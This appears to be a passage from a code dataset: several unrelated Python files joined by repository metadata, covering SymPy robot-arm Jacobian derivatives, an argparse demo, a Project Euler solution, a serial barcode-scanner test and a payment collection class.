djacobi_6 = sy.diff(jacobi_r_Wo_6, t) # djacobi_7 = sy.diff(jacobi_r_Wo_7, t) # djacobi_GL = sy.diff(jacobi_r_Wo_GL, t) # # # dqを時間の変数にしたいとき # # dq1 = sy.Function("dq1") # # dq2 = 
sy.Function("dq2") # # dq3 = sy.Function("dq3") # # dq4 = sy.Function("dq4") # # dq5 = sy.Function("dq5") # # dq6 = sy.Function("dq6") # # dq7 = sy.Function("dq7") # # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_5 = 
djacobi_5.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # dqを時間に依らないとしたいとき # dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7') # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7)]) # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), 
dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacob_BL 
= sy.simplify(djacobi_BL) # djacob_0 = sy.simplify(djacobi_0) # djacob_1 = sy.simplify(djacobi_1) # djacob_2 = sy.simplify(djacobi_2) # djacob_3 = sy.simplify(djacobi_3) # djacob_4 = sy.simplify(djacobi_4) # djacob_5 = sy.simplify(djacobi_5) # djacob_6 = sy.simplify(djacobi_6) # djacob_7 = sy.simplify(djacobi_7) # djacob_GL = sy.simplify(djacobi_GL) # print("BL = ", djacobi_BL) # print("0 = ", djacobi_0) # print("1 = ", djacobi_1) # print("2 = ", djacobi_2) # print("3 = ", djacobi_3) # print("4 = ", djacobi_4) # print("5 = ", djacobi_5) # print("6 = ", djacobi_6) # print("7 = ", djacobi_7) # print("GL = ", djacobi_GL)
37.332046
96
0.445134
b797229800135fc011bc9b38749536448f35264c
568
py
Python
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
4
2020-12-28T23:43:35.000Z
2022-01-01T18:34:18.000Z
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
null
null
null
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
9
2020-09-26T19:29:28.000Z
2022-02-07T06:41:00.000Z
import argparse def main(): parser = argparse.ArgumentParser() parser.add_argument('--age', help='Enter your age (int)', type=int, required=True) parser.add_argument('--name', help='Enter your name (str)', type=str, required=True) parser.add_argument('--admin', help='Are your an admin? (bool)', type=bool, required=False) args = parser.parse_args() age = args.age name = args.name is_admin = args.admin print(age, type(age)) print(name, type(name)) print(is_admin, type(is_admin)) if __name__ == '__main__': main()
28.4
95
0.65669
b79b1b889b94911ce0e4e6155e66ab11d9bf5953
665
py
Python
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
1
2020-02-11T02:03:02.000Z
2020-02-11T02:03:02.000Z
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
null
null
null
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
null
null
null
#Project Euler Question 64
#Odd period square roots

import math


def continued_fraction_period(n):
    """Period length of the continued fraction of sqrt(n); 0 for squares.

    Uses the standard exact integer recurrence
        m_{k+1} = d_k * a_k - m_k
        d_{k+1} = (n - m_{k+1}^2) // d_k
        a_{k+1} = (a0 + m_{k+1}) // d_{k+1}
    which terminates exactly when a_k == 2 * a0.  The original code
    approximated this with Decimal arithmetic at a fixed precision and
    detected cycles by comparing 10-character string prefixes — slow and
    fragile (a precision shortfall or prefix collision miscounts the
    period).  The integer recurrence is exact.
    """
    a0 = math.isqrt(n)
    if a0 * a0 == n:
        return 0  # perfect square: no periodic part
    m, d, a = 0, 1, a0
    period = 0
    while a != 2 * a0:
        m = d * a - m
        d = (n - m * m) // d
        a = (a0 + m) // d
        period += 1
    return period


def count_odd_periods(limit):
    """Count n in [1, limit) whose sqrt continued fraction has an odd period."""
    return sum(
        1 for n in range(1, limit) if continued_fraction_period(n) % 2 != 0
    )


# Same range as the original script (n = 1 .. 9999), same single-number
# output.
odd_count = count_odd_periods(10000)
print(odd_count)
23.75
60
0.574436
b7fab05c9e75761de2933e8475a2d68aab00c447
1,579
py
Python
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
2
2021-03-25T22:00:07.000Z
2022-01-20T15:51:48.000Z
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""Serial-port test for a barcode scanner: 'D' starts a scan, 'E' stops it."""
__author__ = "aaron.qiu"

import serial
import time
import string
import io

if __name__ == "__main__":
    # Configure the port up front, then open it explicitly below.
    ser = serial.Serial()
    ser.port = "COM2"
    ser.baudrate = 115200
    ser.stopbits = serial.STOPBITS_ONE
    ser.timeout = 0
    ser.parity = serial.PARITY_NONE
    # ser.rtscts = 1
    print(ser)

    # Equivalent one-shot constructor:
    # ser = serial.Serial('COM2', 115200, timeout=0,
    #                     parity=serial.PARITY_NONE, rtscts=1)
    try:
        ser.open()
    except Exception as e:
        print("error open serial port: " + str(e))
        exit()

    if ser.isOpen():
        print("ready====")
        try:
            ser.write(b"D")  # trigger the scanner
            print("write data: D")
            time.sleep(0.5)  # give the serial port some time to receive data

            # Read exactly ten lines, pausing three seconds before each.
            for _ in range(10):
                time.sleep(3)
                response = ser.readline()
                print(bytes.decode(response))
                print("read data: " + str(response, encoding="utf-8"))
            ser.close()
        except Exception as e1:
            print("error communicating...: " + str(e1))
    else:
        print("cannot open serial port ")
22.557143
97
0.537682
12cf4624bca1b05e6af0d6fa0ea8fd352dbc7f99
3,119
py
Python
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from collections import defaultdict
from onegov.core.collection import GenericCollection, Pagination
from onegov.pay.models import Payment
from sqlalchemy import desc
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import undefer


class PaymentCollection(GenericCollection, Pagination):
    """ Manages the payment records.

    To render a list of payments you might want to also consider the
    :class:`onegov.pay.collection.payable.Payable` collection, which
    renders payments by loading the linked records first.

    """

    def __init__(self, session, source='*', page=0, start=None, end=None):
        # source: payment provider source; '*' means payments of all sources
        # page:   zero-based page index used by the Pagination mixin
        # start/end: optional inclusive bounds on Payment.created
        super().__init__(session)
        self.source = source
        self.page = page
        self.start = start
        self.end = end

    @property
    def model_class(self):
        # Resolve the polymorphic Payment subclass matching the configured
        # source, falling back to the Payment base class.
        return Payment.get_polymorphic_class(self.source, Payment)

    def add(self, **kwargs):
        # Default the new record's source to the collection's source,
        # unless the collection spans all sources ('*').
        if self.source != '*':
            kwargs.setdefault('source', self.source)

        return super().add(**kwargs)

    def __eq__(self, other):
        # Two collections are equal when they describe the same slice of
        # payments (same source, page and date bounds).
        # NOTE(review): no matching __hash__ is defined, which makes
        # instances unhashable — presumably they are never used as dict
        # keys or set members; confirm before relying on that.
        return all((
            self.source == other.source,
            self.page == other.page,
            self.start == other.start,
            self.end == other.end
        ))

    def subset(self):
        # Newest payments first, optionally constrained to the
        # [start, end] creation window.
        q = self.query().order_by(desc(Payment.created))

        if self.start:
            q = q.filter(self.start <= Payment.created)

        if self.end:
            q = q.filter(Payment.created <= self.end)

        # Eagerly load the provider and the (otherwise deferred) created
        # timestamp to avoid per-row queries when rendering.
        q = q.options(joinedload(Payment.provider))
        q = q.options(undefer(Payment.created))

        return q

    @property
    def page_index(self):
        return self.page

    def page_by_index(self, index):
        # NOTE(review): start/end are not forwarded, so switching pages
        # drops the date filter — verify this is intended.
        return self.__class__(self.session, self.source, index)

    def payment_links_for(self, items):
        """ A more efficient way of loading all links of the given batch
        (compared to loading payment.links one by one).

        Returns a dict mapping payment id -> list of linked records.

        """
        payment_links = defaultdict(list)

        for link in Payment.registered_links.values():
            # Ids of the linked records that reference any payment of the
            # batch, looked up through the link (association) table.
            targets = self.session.query(
                getattr(link.table.columns, link.key)
            ).filter(
                link.table.columns.payment_id.in_(tuple(
                    p.id for p in items
                ))
            )

            q = self.session.query(link.cls)
            q = q.filter(link.cls.id.in_(targets.subquery()))
            q = q.options(joinedload(link.class_attribute))

            for record in q:
                payments = getattr(record, link.attribute)

                # The attribute may hold a collection of payments or a
                # single payment; iterating a single one raises TypeError.
                try:
                    for payment in payments:
                        payment_links[payment.id].append(record)
                except TypeError:
                    payment_links[payments.id].append(record)

        return payment_links

    def payment_links_by_subset(self, subset=None):
        # Links for an explicit subset, defaulting to this collection's
        # filtered query.
        subset = subset or self.subset()
        return self.payment_links_for(subset)

    def payment_links_by_batch(self, batch=None):
        # Links for the current page's batch; None when the page is empty.
        batch = batch or self.batch

        if not batch:
            return None

        return self.payment_links_for(batch)
29.990385
76
0.603399